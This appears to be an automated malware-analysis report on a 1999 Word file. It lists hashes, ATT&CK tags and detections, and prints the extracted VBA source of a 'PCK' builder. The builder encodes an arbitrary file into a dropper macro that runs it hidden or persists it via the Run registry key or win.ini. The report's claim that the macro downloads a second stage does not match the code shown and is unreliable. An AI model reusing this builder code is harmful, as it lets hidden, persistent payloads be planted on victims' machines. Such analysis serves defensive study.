Office (OLE) malware analysis — malicious · 7d48b26f6be0245d

MALICIOUS

Office (OLE)

377.0 KB Created: 1999-06-17 19:19:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 40badedf33e7735c0a6cf2a15d1f5738 SHA-1: a14146cb0603023bc3c41af12ecb8583eb9e62be SHA-256: 7d48b26f6be0245db05de8cbee341fd3fdf22c41d60c8f2a52d7cf3112fa0128

140 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1204.002 Malicious File

The sample is a Microsoft Word document containing VBA macros. The macros utilize the Shell() function and also attempt to write to the registry Run key to establish persistence. The script logic suggests it is designed to download and execute a second-stage payload, indicated by the 'PayloadString' variable and the file reading operations.

Heuristics 3

ClamAV: Win.Tool.Macro-17 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Win.Tool.Macro-17
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7848 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	7848 bytes
SHA-256: `ca6eced3b08ed754864d12376bc08b4a0af75dfba2e7e57335a6ff2ba68e8f74`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub Execute_PCK() PCK.Show End Sub Attribute VB_Name = "PCK" Attribute VB_Base = "0{CD058D2D-46BE-11D3-8BBE-44455354616F}{CD058D20-46BE-11D3-8BBE-44455354616F}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Dim PayloadString As String Dim TmpStr As Integer Dim OutStr As String Private Sub Create_Click() If OptionButton1.Value = True Then RunStr = "" If OptionButton2.Value = True Then RunStr = "Shell " & Chr(34) & FTD.Text & Chr(34) & ", vbHide" If OptionButton3.Value = True Then RunStr = "System.PrivateProfileString(" & Chr(34) & Chr(34) & ", " & Chr(34) & "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" & Chr(34) & ", " & Chr(34) & "PCK Public Beta" & Chr(34) & ") = " & Chr(34) & FTD.Text & Chr(34) If OptionButton4.Value = True Then RunStr = "System.PrivateProfileString(" & Chr(34) & "C:\Windows\Win.ini" & Chr(34) & ", " & Chr(34) & "windows" & Chr(34) & ", " & Chr(34) & "run" & Chr(34) & ") = " & Chr(34) & FTD.Text & Chr(34) Open FTC.Text For Binary As #1 PayloadString = Input(LOF(1), #1) Close #1 For X = 1 To Len(PayloadString) Y = Y + 1 TmpStr = Asc(Mid(PayloadString, X, 1)) OutStr = OutStr & "Chr(" & TmpStr & ")" If X < Len(PayloadString) Then OutStr = OutStr & " + " If Y = 10 Then If X < Len(PayloadString) Then OutStr = OutStr & "_" & Chr(13) & Chr(10) Y = 0 End If Next X Open SourceOut.Text For Output As #1 Print #1, "Sub Payload()" Print #1, "Open " & Chr(34) & FTD.Text & Chr(34) & " For Output As #1" Print #1, "Print #1, " & OutStr Print #1, "Close #1" Print #1, RunStr Print #1, "End Sub" Close #1 End Sub 'PCK Public Beta is property 'of the public, hence the name. 'Feel free to modify PCK... Be 'sure to send me a copy of your 'changes. And by the way if you 'do change PCK, please acknowledge 'that I was The original creator. 'Thank you for your interest, Lys ' Processing file: /opt/analyzer/scan_staging/da3024b3c53f40c5922a44e17740d410.bin ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 5250 bytes ' Line #0: ' FuncDefn (Sub Execute_PCK()) ' Line #1: ' Ld PCK ' ArgsMemCall Show 0x0000 ' Line #2: ' EndSub ' Macros/VBA/PCK - 22802 bytes ' Line #0: ' Dim ' VarDefn PayloadString (As String) ' Line #1: ' Dim ' VarDefn TmpStr (As Integer) ' Line #2: ' Dim ' VarDefn OutStr (As String) ' Line #3: ' FuncDefn (Private Sub Create_Click()) ' Line #4: ' Ld OptionButton1 ' MemLd Value ' LitVarSpecial (True) ' Eq ' If ' BoSImplicit ' LitStr 0x0000 "" ' St RunStr ' EndIf ' Line #5: ' Ld OptionButton2 ' MemLd Value ' LitVarSpecial (True) ' Eq ' If ' BoSImplicit ' LitStr 0x0006 "Shell " ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' Ld FTD ' MemLd Then ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0008 ", vbHide" ' Concat ' St RunStr ' EndIf ' Line #6: ' Ld OptionButton3 ' MemLd Value ' LitVarSpecial (True) ' Eq ' If ' BoSImplicit ' LitStr 0x001C "System.PrivateProfileString(" ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0002 ", " ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0040 "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0002 ", " ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x000F "PCK Public Beta" ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0004 ") = " ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' Ld FTD ' MemLd Then ' Concat ' LitDI2 0x0022 ' ArgsL ... (truncated)

SHA-256: ca6eced3b08ed754864d12376bc08b4a0af75dfba2e7e57335a6ff2ba68e8f74

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Execute_PCK()
PCK.Show
End Sub

Attribute VB_Name = "PCK"
Attribute VB_Base = "0{CD058D2D-46BE-11D3-8BBE-44455354616F}{CD058D20-46BE-11D3-8BBE-44455354616F}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Dim PayloadString As String
Dim TmpStr As Integer
Dim OutStr As String
Private Sub Create_Click()
If OptionButton1.Value = True Then RunStr = ""
If OptionButton2.Value = True Then RunStr = "Shell " & Chr(34) & FTD.Text & Chr(34) & ", vbHide"
If OptionButton3.Value = True Then RunStr = "System.PrivateProfileString(" & Chr(34) & Chr(34) & ", " & Chr(34) & "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" & Chr(34) & ", " & Chr(34) & "PCK Public Beta" & Chr(34) & ") = " & Chr(34) & FTD.Text & Chr(34)
If OptionButton4.Value = True Then RunStr = "System.PrivateProfileString(" & Chr(34) & "C:\Windows\Win.ini" & Chr(34) & ", " & Chr(34) & "windows" & Chr(34) & ", " & Chr(34) & "run" & Chr(34) & ") = " & Chr(34) & FTD.Text & Chr(34)
Open FTC.Text For Binary As #1
PayloadString = Input(LOF(1), #1)
Close #1
For X = 1 To Len(PayloadString)
Y = Y + 1
TmpStr = Asc(Mid(PayloadString, X, 1))
OutStr = OutStr & "Chr(" & TmpStr & ")"
If X < Len(PayloadString) Then OutStr = OutStr & " + "
If Y = 10 Then
If X < Len(PayloadString) Then OutStr = OutStr & "_" & Chr(13) & Chr(10)
Y = 0
End If
Next X
Open SourceOut.Text For Output As #1
Print #1, "Sub Payload()"
Print #1, "Open " & Chr(34) & FTD.Text & Chr(34) & " For Output As #1"
Print #1, "Print #1, " & OutStr
Print #1, "Close #1"
Print #1, RunStr
Print #1, "End Sub"
Close #1
End Sub
'PCK Public Beta is property
'of the public, hence the name.
'Feel free to modify PCK... Be
'sure to send me a copy of your
'changes. And by the way if you
'do change PCK, please acknowledge
'that I was The original creator.
'Thank you for your interest, Lys

' Processing file: /opt/analyzer/scan_staging/da3024b3c53f40c5922a44e17740d410.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 5250 bytes
' Line #0:
' 	FuncDefn (Sub Execute_PCK())
' Line #1:
' 	Ld PCK 
' 	ArgsMemCall Show 0x0000 
' Line #2:
' 	EndSub 
' Macros/VBA/PCK - 22802 bytes
' Line #0:
' 	Dim 
' 	VarDefn PayloadString (As String)
' Line #1:
' 	Dim 
' 	VarDefn TmpStr (As Integer)
' Line #2:
' 	Dim 
' 	VarDefn OutStr (As String)
' Line #3:
' 	FuncDefn (Private Sub Create_Click())
' Line #4:
' 	Ld OptionButton1 
' 	MemLd Value 
' 	LitVarSpecial (True)
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitStr 0x0000 ""
' 	St RunStr 
' 	EndIf 
' Line #5:
' 	Ld OptionButton2 
' 	MemLd Value 
' 	LitVarSpecial (True)
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitStr 0x0006 "Shell "
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	Ld FTD 
' 	MemLd Then 
' 	Concat 
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x0008 ", vbHide"
' 	Concat 
' 	St RunStr 
' 	EndIf 
' Line #6:
' 	Ld OptionButton3 
' 	MemLd Value 
' 	LitVarSpecial (True)
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitStr 0x001C "System.PrivateProfileString("
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x0002 ", "
' 	Concat 
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x0040 "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run"
' 	Concat 
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x0002 ", "
' 	Concat 
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x000F "PCK Public Beta"
' 	Concat 
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x0004 ") = "
' 	Concat 
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	Ld FTD 
' 	MemLd Then 
' 	Concat 
' 	LitDI2 0x0022 
' 	ArgsL
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.